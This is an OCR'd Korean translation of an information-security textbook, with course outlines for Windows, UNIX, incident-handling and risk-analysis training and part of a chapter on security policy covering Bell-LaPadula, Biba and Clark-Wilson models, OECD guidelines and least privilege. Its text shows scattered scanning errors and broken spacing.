임의의 접근조종 : 그룹구성 및 허가; 체계 파일의 보호 : 사건검열 : Windows NT 도구들의 
리용 ; 체계의 구성 및 유지 

주의 강습생들이 INFOSEC 203을 완전히 학습하여 IT 보안개념에 대한 기본적인 리 
해를 가지는것 이 필수적 인 전제 로 된다. 


INFOSEC 303 Windows 2000보안 


개팔 이 과정 안은 Windows 2000조작체 계 의 보안특성 들을 잘 구성 하는 방법 에 기 본 
을 둔다는것외 에는 INFOSEC 302와 류사하다. 강습생 들은 실체 험적 인 를퓨터학습실에 조 
작체 계 를 설 치구성하면서 Windows 2000의 보안특성 들을 배 운다. 

강습대상 이 과정안은 Windows 2000조작체 계를 리용하는 망들의 설치，구성 및 관리 
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를 책임진 종업원들을 위한 과정안이다. 이들가운데는 정보관들, 체계관리자들과 체계담 
당일군들이 있게 된다. 

강습내용 Windows 2000 조작체계개 념 : 령역이름체계 (DNS) : 이동하는 Windows NT 
4.0 령역들 ; 식별 및 인증조종 : 임의의 접근조종 : 파일체계자원 (NTFS) : 그룹구성과 허 
가 : 등록부 및 파일 조직 과 허 가 ; 체 계 파일 보호 : 사건검 사 : Windows 2000 도구를 리 용한 
체계의 구성 및 유지 

주의 강습생들이 INFOSEC 203 을 완전히 학습하여 IT 보안개념들에 대한 본질적인 
리해를 가지는것 이 필수적 인 전제 로 된다. 

INFOSEC 304 UNIX 보안 

간단한 해설 이 실체험 과목에서 는 강습생 들이 UNIX 조작체 계 에 보안을 실현하는데 
필요한 지식과 기술기능을 체득하게 될것이다. 여기서는 내부와 외부의 위험으로부터 체 
계 의 보안，유닉 스파일체 계 의 보호，운용관리 자접 근조종，취 약성 을 최 소화하고 침 입 자를 
색 출하기 위하여 도구프로그람들의 구성 문제 를 배 울수 있 다. 

강습대상 이 과정안은 유닉스조작체계를 리용하는 망의 설치，구성，관리를 책임진 
종업 원들을 위한 과정안이 다. 여기서는 정보관들，체 계관리 자들과 체 계담당일군들이 학습 
할수 있다. 

강습내용 UNIX 보안개 론 ; 안전한 구좌설정 : 구좌정 보보관 : 뿌리접 근조종 : 등록부 및 
파일허가; 비법프로그람에서 위험요소의 최소화， TCMP 와 보안에 대한 리해 

주의 강습생들은 INFOSEC 203 을 완전히 학습하여 IT 보안개념들에 대한 본질적인 
리 해 를 가지 는것 이 필 수적 인 전제 로 된 다. 

INFOSEC 305 상급 ISS 0 양성 

개팔 이 과정안에서는 ISSO 의 임무를 명백히 제시한다. 보안계획，사고방지계획 혹 
은 재 해복구계 획과 IT 체 계 인증의 재검 토 ; IT 체계사고의 처 리와 특정 IT 보안실 례연구문제 
의 검토 및 평가에 초점을 돌리게 된다. 

강습대상 이 과정안은 INFOSEC 205 를 완전히 학습하고 ISSO 로서 적 어도 1 년간의 
경험 이 있는 ISSO 를 위한 과정 안이 다. 

강습내용 IT 체 계보안계 획 과 사고방지 계 획의 재 검 토에 대 한 감시임 무 ; IT 체 계 사고처 
리 : 실례연구 

INFOSEC 306 사고처리 

개팔 이 과정안에서는 IT 체 계보안사고처 리 절차를 설명하게 된다. 여 기서 는 위험성 에 
대 한 사고들을 분류하는 방법 을 밝히 는것 으로부터 시 작하여 조사를 시 작하고 진행하는 
방법，지 원을 받기 위해 누구와 련계 를 가져 야 하는가 하는 문제 들을 취 급한다. 사건해 결 
의 열쇠는 조사중에 설비와 정보가 손상되지 않게 하는것이다. 그러므로 강습생들은 자 
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산과 정보를 안전하게 보관하는 해당 절차를 배우게 된다. 

강습대상 이 과정안은 IT 보안사건취 급을 담당한 종업 원들을 위한 과정안이 다. 이 종 
업원들가운데 는 정 보관, 정 보체 계보안관，보안관，콤퓨터 사고에 우려 를 표시하는 사람들 
이 속한다. 

강습내용 IT 체 계보안사고의 리해 : 련방법 률과 민사법 적 및 형 사법 적제재 : 기 관방책 
및 형벌 ; 보안조사절차 : 조사당국의 식별 : 법집행기관들과의 련계，보증인면담，증거보호， 
IT 체 계 보안사고보고서 작성 법 

주의 강습생 들이 INFO 況 C 205를 완전히 학습하여 IT 보안개 념들에 대 한 본질적리해 
를 가지는것 이 필수적 인 전제 로 된다. 

INF 0 SEC 307 우 I 험분석 또는 평가방법 

개팔 이 과정안에서는 위험분석 및 평가공정을 취급한다. 여기서는 위험분석의 중요 
성，위험분석목적，위험분석의 가장 적절한 시기，위험평가(전자도구의 검토)를 위한 각이 
한 방법들을 개괄하며 많은 실체험기회를 보장하여 본보기위험분석을 완성하게 한다. 위 
험 분석 및 평 가의 결정 적 요소는 목표분석 과 목표평 가이 다. 불법 침 입 자가 정 보체 계 위 험 분 
석을 진행하여 공격하기 쉬운 약점들을 알게 될수도 있다. 

강습대상 위험분석을 완성 할 임무를 말은 사람들. 정보관，체계관리자，프로그람관리 
자，정보체계보안관과 보안관이 여기에 속할수 있다. 

강습내용 위험분석개관 ; IT 체계들의 취약성 : 위험 및 민감도와 효과적인 대응책들에 
대한 리해 : 위험분석의 목적 : 위험분석방법들 ; 위험분석진행에 대한 련방의 지도 : 위험 
분석진행공정 : 전자적 인 위 험분석 도구들 : 본보기위 험분석 표(자산가치，위험 및 취 약성의 
평 가，위 험 수준，대 응책)의 완성 : 목표분석 혹은 평 가의 재 고찰 

주의 이 과정안을 취 급하면서 INFOSEC 2()1 과 INFOSEC 206도 배 합하여 리용할수 
있 다. 
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제 2 0 장. 방책개발 


크리스 해어 


이 장에서는 기관들에서 왜 보안방책을 세우는가 하는 문제를 취급한다. 방책의 구 
조，형식，절차，표준 및 지침을 론의하지 않고 방책이 왜 필요한가와 공식적 및 비공식 
적보안방책，보안모형 및 보안방책의 형식을 고찰하게 된다. 


기관문화의 영향 


방책개발문제를 고찰할 때 기관문화가 매우 중요하다. 작업장은 사람들이 일하는 단 
순한 장소가 아니 다. 작업장은 사람들이 맡은 일을 수행할뿐아니라 서로 교제하고 자기 
들의 직업과 생활에 대하여 자유롭게 의견을 교환하기 위하여 모이는 장소이기도 하다. 

방책을 세울 때 이런 문제를 고려하는것이 중요하다. 기관을 더 개방하면 할수록 무 
거운 제재방책은 종업원들에게 그만큼 더 어렵게 접수될것이다. 문화가 더 제약되면 될 
수록 즉 종업원들사이에 그들이 관심하는 문제에 대한 의견교환을 그만큼 더 적게 할수 
록 방책에는 그만큼 더 엄격한 제재조건이 반영될수 있다. 또한 방책의 어조나 초점은 
보다 연할수도 있고 보다 강할수도 있다. 

종업원들의 호상의견교환수준에는 관계없이 일상조작을 정확히 문서화한 기관은 거 
의 없다. 이 극단적인 작업환경을 방책에 포함시키기는 어려운것이다. 그러나 이런것은 
훌륭한 보안조작에는 더없이 필요한것이다. 


보안방책의 력사 


보안방책은 보안목적을 달성하기 위하여 기관의 자원을 어떻게 관리，보호, 할당하는 
가 하는것을 규제하는 실천조항들로 이루어 진다. 이 보안목적들은 기관의 목표와 환경 
에 조화되여야 하며 기관이 보안목적을 적용하게 될 방법을 결정해야 한다. 기관의 목표 
와 보안목적은 서로 결합되여야 사기행위와 사람의 실수와 련관된 위험을 경감시키는 거 
의 모든 기업실천에 적용된 관리조종을 안받침하게 된다. 

보안방책들은 점차로 전개되여 나가며 보안원리들에 기초하고 있다. 이런 방책들욜 
반드시 기술적인것으로 되는것은 아니지만 그 방책을 지침으로 하면 체계를 실현하는데 
사용되는 기술과 밀접히 련관된다. 

보안모형들 

보안방책은 경영진에 의하여 이루어 지는 결정이다. 어떤 경우에는 보안방책이 보안 
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모형에 의존한다. 보안모형은 방책과 기술을 실현하는 방법을 규정한다. 이 모형은 전 
기간 확인된 전형적인 수학적모형 이다. 이런 수학적모형으로부터 방책을 개발한다. 모형 
이 창조되면 그것을 비공식적보안모형 이라고 부론다. 모형이 수학적으로 확인되면 공식 
적인 모형으로 된다. 모형의 확인과 관련된 수학은 이 장의 범위를 벗어 나므로 여기서 
는 론의하지 않는다 . 이 런 공식 적 인 세개의 보안모형 으로서 는 Bell - Lapadula 보안모형 및 
Biba 보안모형 과 Clark - Wilson 보안모형 들 이 다 . 

Bell-Lapadula 모형 Bell-Lapadula 즉 BLP 모형 은 정 보보안을 위한 비 밀성 에 기 초한 모 
형이다. 이 모형은 실현의 기초로 되는 추상적인 모형인바 가장 대표적인것은 국방성 
( DoD ) 의 오렌지 책 (Orange Book ) 이 다. 모형 은 한 보안상태 로부터 다른 보안상태 에 로 체 계 
를 옮기는 특정한 변환기능을 가진 안전상태의 개념을 규정한다. 모형은 읽기 및 쓰기와 
관련된 기 본접 근방식 과 당사자가 대 상에 접 근하는 방법 을 규정한다. 

안전한 상태는 작성된 보안방책에 따라 당사자가 대상에 접근하는것과 같은 오직 승 
인된 접근방법들만이 리용되는 경우이다. 보안보존에 관한 개념은 이런 상태에서 성립된 
다. 이것은 체계가 안전한 상태에 있을 때 새로운 규칙을 적용하면 체계를 또 다른 안전 
한 상태에로 옮기게 될것이라는것을 의미한다. 이것은 체계가 한 안전한 상태로부터 또 
다른 안전한 상태 에 로 넘 어 가는 경우에 중요하다. 

BLP 모형은 당사자와 대상과 련관된 통과허가수준에 기초한 접근을 식별하며 다음에 
는 읽기전용，읽고 쓰기 혹은 쓰기전용접근만을 식별한다. 모형은 접근의 두가지 특성을 
기 초로 한다. 단순한 보안특성 즉 SS 특성 은 읽 기접근특성 이 다. 이것은 대상이 당사자보 
다 분류수준이 더 높은 자료를 읽 을수 없다는것을 제 시한다. 이것을 《 no - read - up 》 (그 
이상 읽을수 없음)이 라고 한다. 둘째 특성 은 별특성 즉 * 특성 이 라고 하는데 읽 기접근과 
련관된다 . 당사자는 분류수준이 갈거 나 높은 대상에만 정 보를 기록할수 있다 . 이것 을 
《 no - write - down 》 (그 이 하는 기 록할수 없 음) 혹은《 제 한특성》이 라고 한다 . 이 런 식 으 
로 당사자는 한 기밀급에서 다른 낮은 기밀급에로 정보를 복사하지 못하게 할수 있다. 

이런것은 좋은것이기는 하나 매우 제한적이다. 대상의 전체와 일부를 식별할수 없다. 
모형자체 로는 분류를 변화시 킬수 없다. 

당사자가 임의의 대상에 특정한 접근방법 이 어떤것 이 라는것을 규정 하기때 문에 BLP 
모형은 임의의 보안모형이다. 

Biba 모형 Biba 모형은 무결성모형에 대한 첫 시도였다. 무결성모형이 흔히 비밀성모 
형과 충돌하게 되는것은 이 두 모형을 균형잡기가 쉽지 않은것과 관련된다. Biba 모형은 
실세계보안방책과 직접 련관되지 못하기때문에 많이 사용하지 못하였다. 

Biba 모형은 그 요소들이 한조의 당사자들(능등적인 정보처리를 하는)과 한조의 피동 
적 인 정 보보관대 상들인 무결 성 준위 와 같은 계 층적격 자에 기 초한다 . Biba 모형 의 목적 은 
무결성이라는 첫째 목표를 실현하는것이다. 다시 말하여 비법사용자가 정보에 수정을 가 
하지 못하게 하는것이다. 

Biba 모형 은 BLP 와 같은 수학적모형 이 다. 낮은 준위의 읽기 에 의해 정보의 비밀성 이 
상실될수 있는것과 마찬가지로 무결성모형에서 낮은 준위의 읽기에 의해 높은 준위의 무 
결성이 떨어 질수 있다. 

BLP 모형 과 류사하게 Biba 모형 은 ss - 특성 과 *- 특성 을 리 용하여 제 3특성 을 보충한다 . 
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SS- 특성 은 당사자가 무결성 이 더 적 은 대 상을 접 근하거 나 관찰하거 나 읽 을수 없 다는것 을 
제시한다. *_ 특성은 보다 높은 무결성을 가진 대상을 수정 혹은 기록할수 없다는것을 
제 시한다. 제3특성은 청 원특성 이 다. 이 특성 은 당사자가 통보문(즉 봉사에 대 한 론리 적 
요청)을 보다 높은 무결성대상에 보낼수 없다는것을 제시한다. 

Clark-Wilson 모형 Biba 와는 달리 Clark - Wilson 모형은 3가지 무결성목표들을 다 다룬다. 

• 비 법사용자가 수정 을 가하지 못하게 하는것 

• 내적 및 외적일관성을 유지 하는것 

• 합법사용자가 부정 수정 을 하지 못하게 하는것 

주의: 내적인 일관성이란 프로그람이 매번 수행될 때마다 예견된대로 정확히 시동한 
다는것을 의미한다. 외적 인 일관성 이 란 프로그람자료와 실세계자료가 일치 한다는것을 의 
미 한다. 

Clark - Wilson 모형은 잘 이루어 진 거래에 의거한다. 이것은 내적 및 외적일관성요구 
들을 보존할수 있도록 충분하게 구조화되고 제약된 거래이다. 이것은 또한 셋째 무결성 
목표와 외 부일 관성 을 실 현 하기 위한 임 무의 분할을 요구한다 . 이 를 위하여 조작은 소부 
분들로 나누어 지고 서로 다른 인원 및 공정은 각각 하나의 소부분에 대한 책임을 맡게 
된다. 이렇게 하여 주입된 자료가 체계밖에서 리용될수 있는 정보와 일치하게 할수 있는 
것 이 다. 이 렇게 되면 또한 사람들이 승인없이 변화시키지 못하게 할수 있는것 이 다. 다른 
부분은 보안방책 들이다. 

표 20 — 1은 BLP 와 Biba 모형들의 특성들을 비교한것이다. 이 공식적인 보안모형들은 
다 그것들이 매 모형의 목적들을 실현할수 있다는것을 수학적으로 확증하여 보여 주었다. 
이 보안모형 들은 갈은 부분은 일부이 고 다른 부분은 보안방책들이다. 

표 20-1 B 1_ F^F Biba 모형의 특성들 


특 성 

BLP 모형 

Biba 모형 

SS- 특성 

당사자는 보다 높은 부류의 대상에 대한 읽기 
또는 접근을 할수 없다(그이상 읽을수 없음). 

당사자는 보다 낮은 무결성수준의 대 

상을 관찰할수 없다. 

특성 

당사자는 갈거나 혹♦ .보다 높은 부류의 대상 
만을 보관할수 있다(그 이하로 기록못함). 

당사자는 보다 높은 무결성 수준의 대 

상을 수정 할수 없 다. 

청원특성 

리용되 지 않는다 

당사자는 보다 높은 무결성 수준의 대 

상에 론리 적 봉사요청 을 보낼수 없 다. 


보안방책 

1992년에 경제협 력개발기구 ( OECD ) 는 법률，방책，기술적 및 행적적조치와 교육에 대 
한 일 련의 개 발지침 들을 발표하였 다. 이 지 침 들은 다음과 갈은것 들이 다. 
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1 . 책임. 정보보안에 인입된 사람들은 자기들의 행동에 대한 특정한 책임을 져야 한다. 

2. 의식. 누구나 다 보안조치，실행문제와 절차에서 필수적인 지식을 소유할수 있어 
야 한다. 

3. 도덕. 정보체계와 그와 련관된 보안절차가 리용되는 방법은 사적비밀，권리 및 
다른 사람들의 합법적리 익을 존중할수 있어 야 한다. 

4. 여러 전문분야의 방책. 방책 과 기 술의 개 발에서 모든 분야의 의 견을 고려해 야 한 
다. 여기에는 법률, 기술，행정，상업，교육，기관 및 운영분야의 의견들이 포함 
된 다. 

5. 균형. 보안조치들은 정보의 가치와 해당 위험수준에 기초해야 한다. 

6. 통합. 보안조치들은 통합하여 함께 작용하도록 해야 하며 보안체계에서 방어심도 
를 구축해 야 한다. 

7. 시기성. 보안위반이 생겼을 경우 모든 사람들은 다 함께 보조를 맞추어 신속하게 
행동하여 야 한다. 

8. 재평가. 보안절차와 필요성은 주기적으로 재평가되여 기관의 필요성을 실현하여 
야 한다. 

9. 민주주의. 정보와 그것이 보관되는 체계의 보안은 그 정보의 합법적리용 및 전송 
과 보조를 맞추어 진행되여야 한다. 

OECD 보안방책외 에 방책 을 규정할 때 몇 가지 보충방책 들을 명 심하는것 이 중요하다 . 
이 방책들은 다음과 같다. 

10. 개인책임. 개별적인 사람들은 다 오직 보안체계의 성원으로 간주되며 사용자들 
은 자기들의 행동에 대 하여 책임 진다. 

11. 인증. 사용자의 확인 및 인증에 기초하여 특정한 정 보 혹은 체계 에 접 근할 권한 
을 부여할수 있게 보안조치 가 취 해 져 야 한다. 

12. 최소의 특전. 개별적사람들은 자기의 작업임무를 완성하는데 필요한 정보에만 
그리고 그들이 그런 작업을 하는 조건에서만 정보에 접근할수 있어야 한다. 

13. 임무의 분담. 사람들에게 기능을 분담하여 단 한사람도 부정행위를 할수 없도록 
해야 한다. 

14. 검사. 수행되는 작업과 그와 련관된 결과들을 감시하여 설정된 절차를 지키고 
진행하는 작업 을 정 확하게 하도록 하여 야 한다. 

15. 예비조성. 필요한 경우에 정보들에 접근할수 있도록 해야 한다. 실례로 한 체계 
가 쓸수 없게 되는 경우에 다른 체계에 정보를 복사하여 계속 접근할수 있게 
해야 한다. 

16. 위험경감. 한 사람이 위험을 완전히 제거할수 있다고 말하는것은 비실천적 이다. 
그러므로 가능한껏 위험을 경감시키는것을 목적으로 한다. 

실세 계 보안방책 에는 방책 을 작성 하고 실현할 때 고려해 야 할 중요한 일 련의 역 할들 
이 있 다. 이 역 할들은 방책의 각이한 요소들을 실현하는데서 나서는 요구들사이 의 차이 
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점들을 밝혀 주므로 중요한것이다. 이런 역할들은 다음과 갈다. 

1. 발기자 정보를 만드는 사람 

2. 위임자 정 보접 근을 관리하는 사람 

3. 소유자 우의 두 역 할을 겸 비하였거 나 겸 비하지 못한 사람 

4. 보호자 정 보접 근을 관리하며 정 보접 근과 관련한 위 임 자의 의 도를 수행하는 사람 

5. 사용자 작업 임무를 완성 하기 위하여 정 보접 근을 최 종적 으로 원하는 사람 

중요보안목표들(비밀성，무결성 및 리용성)을 보면 보안방책들은 흔히 처음 두 목표 
즉 비밀성과 무결성을 위주로 작성된다. 비밀성은 정보의 비밀 및 접근에 관한것이다. 
비밀성 에서는 또한 보호된 정보에 대 한 비 법접근，수정 및 파괴 에 관한 문제를 취급한다. 
무결 성 은 정 보수정 을 방지하며 수신 인 이 정 보를 요구할 때 정 확하게 정 보를 받을수 있게 
하는 문제에 관한것이다. 

흔히 이 두 목표는 서로 다른 목적으로 하여 충돌하게 된다. 앞에서 언급한바와 같 
이 Bell - Lapadula 모형은 비밀성을 다투는데 이것은 우연히도 국방성이 개발한 신뢰성콤퓨 
터사용표준평가기준의 목적이기도 하다. 

리용성 은 필 요한 경 우에 정 보를 항상 리용할수 있게 하는데 기 본을 두고 있 으므로 
다른 문제 에 속한다. 보안이 이 목표에 영 향을 주지 만 정 보의 리용성 에 긍정 적 및 부정 
적영 향을 줄수 있는 다른 여 러 가지 요인들도 있 다. 

《 만리 장성 》 (Chinese Wall ) 방책 은 그것 으로서 는 공식 적 인 보안모형 으로는 되 지 못하 
지 만 알아둘 가치 는 있다. 이 방책 에서는 리해의 충돌중심 으로 정보를 그 급에 따라 분 
류한다. 사람들은 자기들의 작업기능을 수행 하기 위하여 의뢰기 내부운영과 관련된 정보 
에 자주 접근할 필요가 있다. 그렇게 하여 갈은 기업의 다른 의뢰기들에 의견을 주게 되 
면 그것들은 리해의 충돌에 직 면하게 된다. 정 보를 그 급에 따라 분류하면 공급자는 의 
퇴기와 관련된 다른 정보를 알수 없다. 《만리장성 》 (Chinese Wall ) 방책은 법률분야와 회 
계분야에서 종종 쓰인다. 

그러 나 보안방책의 범위는 매우 넓다. 성과를 거두자면 보안방책 이 가동하는 기술적 
인 실 천에 신뢰 성 있게 정 확하게 구현되 여 야 한다 . 보안방책 은 모호하지 않게 구체 적으 
로 문서화되여 야 한다. 그렇게 되지 않아 그것을 사람이 일일 이 따라가며 해석해 주게 
되면 그 해석이 입력된 자동화된 체계는 정확히 동작하지 않을수도 있다. 이로부터 방책 
규정을 가능한껏 구체화하는것이 절대적으로 필요한것이다. 오직 이렇게 할 때 보안방책 
의 자동적인 실현이 성과적으로 된다. 

또한 콤퓨터사용정황과 관련하여 몇가지 방책선택을 해야 한다. 이 방책선택에는 콤 
퓨터관련장치의 보안과 사용자들이 어떻게 자기들을 식별하는가 하는 문제들이 포함된다. 
비밀성과 무결성을 성과적인 보안방책에서 결합하는것이 어렵다는것을 기억할 필요가 있 
다. 따라서 성문화된 방책을 자동적인 체계에로 전환할 때 실현단계에서 문제성이 생길 
수 있 다. 기 관의 실세 계 보안계 획 은 기 관의 목표들을 반영하여 야 한다. 

방책자체가 실천적이여야 하며 리용할수 있어야 한다. 방책은 비용의 효과성이 높아 
야 한다. 다시 말하여 방책실현비 가 보호되 는 재 부의 가치 보다 높지 말아야 한다. 방책 
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에는 보안실현의 구체적 인 표준이 반영되여 야 하며 오용에 대한 대응이 밝혀 져야 한다. 
방책은 사용자들이 리해할수 있도록 명백하게 서술되여야 하며 은어가 없어야 한다. 무 
엇보다도 높은 급의 경영진에 대한 지원을 해야 한다. 이런것이 없으면 심지어 제일 훌 
륭한 보안방책도 실패하게 될것이다. 방책에 보안과 사용상의 편의를 반영하는것이 또한 
대단히 중요하다. 사용법이 너무 힘들어서 사용자들이 자기 일을 수행할수 없게 한다면 
기업에 부정적인 영향을 주어 사용자들로 하여금 보안실현을 하지 않고 에돌아 가게 한 
다. 다른 한편 사용상의 편의에 너무 치중하면 기관의 보안자세에 영향을 주어 가능한 
보안의 수준을 떨구게 될수 있다. 

방책은 왜 필요한가 


사람들은 장기적보안이 필요하다는것을 리해하였다. 한 사람이 다른 사람에게 필요 
한 가치 있는것을 가지고 있은 때로부터 사람普聲 보안을 그 재부보호의 필요성과 련결 
시켰다. 대부분의 사람들은 은행에서 금고실과 안전금고를 리용하여 돈과 중요한 문서를 
관리하는 방법에 익숙해 졌다. 은행이 해당 보호절차들을 실행하는 방법을 제시한 방책 
을 가지고 있지 못한다면 대중은 은행에 대하여 신뢰할수 없게 될것이다. 

보안자체는 오랜 력사를 가지고 있다. 콤퓨터는 최근에야 그런 보안의 력사에 들어 
서게 되였다. 사람들은 문에 쇠를 설치하여 도적 이 쉽게 들어 오지 못하게 하였다. 사람 
들은 은행과 다른 기술을 리용하여 가치 있는것，집과 가정들을 보호한다. 군대에서는 
적들로부터 자기 정보를 보호할 필요성을 이미 오래전부터 느꼈다. 이로부터 통보문을 
암호화하는 암호학을 개발하여 적들이 암호문을 읽지 못하게 하였다. 

많은 보안기술과 방책은 개별적인 한 사람이 부정행위를 혼자서 하지 못하도록 하는 
데 목적이 있다. 또한 보안기술과 방책은 적절한 정황에서 감시통제를 보장하는데도 쓰 
인다. 

틍제의 필요성 

방책은 기관의 사람들이 무엇을 할것인가 하는것을 알게 하는데도 필요한것이다. 이 
에 대한 일련의 각이한 리유들 즉 법적순응，주권소유자의 신뢰유지，기관에서 목적들을 
세우고 유지할수 있다는것을 종업원들에게 보여 주는 문제 등이 있다. 

방책과 절차의 수립을 필요로 하는 많은 법적요구들이 있다. 이 요구들에는 성실성 
과 조심성도 포함된다. 성실성은 일정한 법적개념들에서 즉 공정성，리해의 충돌，기업기 
회와 비밀성 등에서 명백히 나타난다. 리해충돌의 정황을 피하기 위하여 개별적사람들은 
기업소의 리익에 간섭할수 있는 그 어떤 외부적관계도 밝혀야 한다. 공정성에서는 리해 
관계의 충돌이 있게 될 때 개별적사람은 모든 당사자들의 리익에 완전히 부합되게 행동 
할 의무를 지닌다. 

병합，획득 및 특허품 등에 대한 사전통고와 갈은 물질적인 내부정보가 제시될 때 
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개별적사람은 그것들을 개인적인 벌이에 리용하지 말아야 한다. 이렇게 하지 않는 경우 
에는 회사의 좋은 기회를 망쳐 버리는 결과를 가져 온다. 

운영상문제가 제기되는 사고가 있을 경우에 이런 요소들은 영향을 미치게 된다. 효 
과적인 준수과정을 제대로 갖추어 회사가 방책，절차와 표준을 제대로 리용하게 하는것 
은 회사에 대한 형사조사를 진행하는 경우에 긍정적인 효과를 낼수 있다. 실례로 준수과 
정 에 고유한 대부분의 기초기능들은 다음과 갈다. 

• 방책，절차 및 표준을 세워 로동력을 지도하는것， 

• 높은 급의 관리 자를 임명 하여 방책，절차 및 표준의 준수를 감시 하는것， 

• 종업원들에게 임의의 권한을 줄 때 응당한 주의를 돌리는것， 

• 모든 종업원들에게 표준과 절차를 알려 주는것， 

• 알맞는 징 벌조치들을 통하여 방책，표준 및 절차들을 일관하게 실시 하는것， 

• 준수사항들을 위반한 경우에 정정 및 수정절차들을 집행하는것. 

법 적 견지 에서 본 세번째 요소는 1996년 경제 정 탐행 위관계 법 ( EEA ) 이 다 . EEA 는 처 음 
으로 무역비밀정보를 훔치는것을 련방범죄로 규정하였으며 범죄들에 벌금，감금 및 몰수 
와 같은 형벌을 적용하였다. 그러나 EEA 는 또한 정보를 가지고 있는 기관들에서 리성적 
인 노력을 기울여 정보를 보호하리라고 기대하고 있다. 

법률적요구사항뿐만아니 라 방책과 절차들을 세워 야 한다는 훌륭한 기 업적리유도 있 
다. 재정적재부를 보호하는것 이 중요한것처 럼 기관에 그렇게 중요한 정보를 보호하는것 
이 중요하다는것은 잘 알려 진 사실이다. 이것은 종업원들, 판매자들，고객들 및 다른 합 
법 적망사용자들에 대 한 통제 가 필요하다는것을 의 미한다. 지구상의 임의의 지 역 에서부터 
정보에 접근하려는 요구가 늘어 나므로 정보보안방책，절차 및 표준을 기관적인 규모에 
서 잘 세우는것 이 중요하다. 

호스트형체 계 로부터 의 뢰 기/봉사기형체 제까지의 콤퓨터리 용환경 에서 많은 변화가 일 어 
나면서 그러한 환경 보호의 복잡성 은 급속히 늘어 났다. 결론적 으로 말하여 통제 를 잘하면 
기 업의 식 이 좋아 진다. 방책 과 절 차들을 잘 실행하지 못하면 사고가 생 겨 사회 적 으로 알 
려 지는 경우에는 회사에 대한 주주들과 시장의 신뢰가 떨어 지는 결과를 가져 오게 된다. 

방책과 절차를 성문화할 때 회사의 임무，가치，기업운영에 대한 확고한 인식을 가지 
는것 이 필 요하다. 기 관을 보호하는데 필 요한 통제항목을 규정 하고 설 정 하기 위하여 방책 
과 절 차가 필요하다는것 과 보안을 위한 보안은 회 사와 그 종업 원 또는 그 주주들에 게 의 
의가 없다는것을 잊지 말아야 한다. 

가장 를릉한 관례의 모색 

변화가 생기고 기업이 발전함에 따라 방책을 재고찰하고 그에 기초하여 기업의 필요 
성 을 계속 실현시키는것 이 필요한것 이 다. 그러 나 기 관들이 다른 기 관들과 련계를 가지 고 
가장 훌륭한 관례와 관련된 정보를 교환하는것이 또한 좋을것이다. 모든 기관들에서는 
부단한 갱 신을 중요한 목표로 하여 야 한다. 가장 훌륭한 산업관례 에 대 한 재 검 토는 기 관 
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들의 성능비교검사이기때문에 그 산업개선의 중요한 부분으로 된다. 

어떤 기관에서는 특별한 방책을 자기식으로 실현하려고 하지만 다른 기관에서는 완 
전히 다른 식으로 할수도 있다. 보안기관들은 정보를 공유함으로써 자기들이 개발한 방 
법들을 개선하고 업계에서 정보전달을 유지할수 있다. 

한 회사가 다른 회사로부터 어떤 문제가 합당하며 어떻게 하는것이 좋겠다는 의견을 
말할수 있는 회합들은 많다. 어떤 문제를 택하며 어떻게 하는것이 좋겠다는 의견을 회사 
들이 서로 나눌수 있는 여기에는 토론연단들이 많다. 콤퓨터보안연구공동작업연단과 국 
제정보무결성강습회(1_4)도 여기에 속한다. 콤퓨터관련설비협회 ( ACM ) 와 같은 공학기관블 
이 주최하는 기 타 특수한 리 익단체 들도 있 다. 

그 어느 경우에나 가장 훌륭한 관례를 마련하자면 구성요소의 제작이건 보안방책의 
실현 이건 시 간이 많이 걸린 다. 


관리 임무 


방책의 작성 과 집 행 에서 경 영 진은 특별한 책 임을 지 닌다 . 여 기 에는 방책명 시，방책 
실천능력소유，방책통보 그리고 방책의 작성 및 집행에 필요한 자원을 보장하는것이 속 
한다. 그러나 경영진은 기관의 물리적 및 정보재부의 보호에 대하여 립법부，종업원，주 
주들앞에 최종적 으로 책임 진다. 이 런 책 임을 다하기 위하여 경 영 진은 기관의 운영과 기 
관의 사업 방법 을 제 시하게 되 는 방책작성 에서 견지해 야 할 일정한 법 적원칙 들을 가진다 . 

성실성의 의무 

매 사원은 사업에서 솔직，성실，절대적신뢰라는 법적인 의무를 지니고 있는데 여기 
에 는 리해 관계의 충돌과 사리를 추구하지 않는것도 포함된다. 매 일 자기 사업 을 책 임적 
으로 수행하는데서 사원들은 비법적이 아닌 이상 언제나 회사의 리익에 가장 잘 부합되 
게 행동하여야 한다. 사원의 리익을 회사의 리익우에 올려 놓는것과 갈은 탈선행위는 그 
어떤 형태이든지 성실，조심，절대신뢰라는 사원의 의무에 대한 위반행위로 간주될수 있 
다. 신용 있는 사원들은 보통의 사원들보다 더 높은 수준의 조심 성 을 발휘하게 된 다. 

어 떤 부서 책 임 자가 자기 부서 사원 이 자기 리 익 을 회 사의 리 익 보다 우선시 하는것 을 
알고 있는 경우 그 부서책임자는 좋기는 서면으로 그 사원에게 회사앞에 지닌 도리를 충 
고식으로 알려 주어 야 한다. 

리해관계의 충돌 

리해 관계의 충돌이 라고 하면 일부 사람들에게 는 리 익을 주지 만 다른 사람에 게 는 해 
를 준다는것을 충분히 알면서도 어떤 결정을 내리는 경우라고 할수 있다. 실례로 두 대 
방이 서 로 리해관계 상 충돌이 있는데 그것 을 알면서 도 두 대 방을 같이 말아 보는 변호사 


306 



가 있다고 하면 그 변호사는 리해관계의 충돌에 빠져 있는것이다. 

조심성의 의무 

조심성의 의무는 지휘성원들이 자기들에게 맡겨 진 중요한 과업을 수행할 때 조심스 
럽게 행동해야 할 의무이다. 실례로 리사는 조심스럽고 신중하게 회사의 리익에 가장 잘 
부합되게 자기 임무를 수행 하여 야 한다. 

더우기 경영자들과 그 아래사람들은 자기들의 임무를 모른다 하더라도 체계를 보안 
하며 기억된 전자정보를 보호해야 할 책임을 지니고 있다. 자기 책임을 모르는 이런 문 
제는 다른 나라들의 일반법에 서술된 바와 같이 과실문제로 된다. 

기관에서 문제가 생긴다 해도 기관이 책임을 다는 지지 않을수도 있다. 

기관에서 다음과 같은것 즉 

• 적절한 사전대책을 취하였다， 

• 흔히 쓰이는 통제수단 및 관례를 적용하였다， 

• 보통 요구되는 보안통제목적에 맞게 한다， 

• 잘 가동하는 콤퓨터 설 비 에 리 용될수 있는 방법 들을 적 용한다， 

• 상식과 신중한 경영상 관례를 적용하였다 

는것을 보여 줄수 있다면 기관에서도 응당한 조심성을 가지고 운영 하였다고 말할수 있을 
것이다. 

최소의 특권 

최소특권의 개념은 그 기능을 수행하는데 실제로 필요되는것보다 더 많은 특권을 매 
공정이 가지지 않는다는것을 의미한다. 《감독》접근 혹은《뿌리》접근(즉 완전한 체계 
특권)을 요구하는 모둘들은 핵심부에 끼워 진다. 핵심부는 체계자원에 대한 모든 요구들 
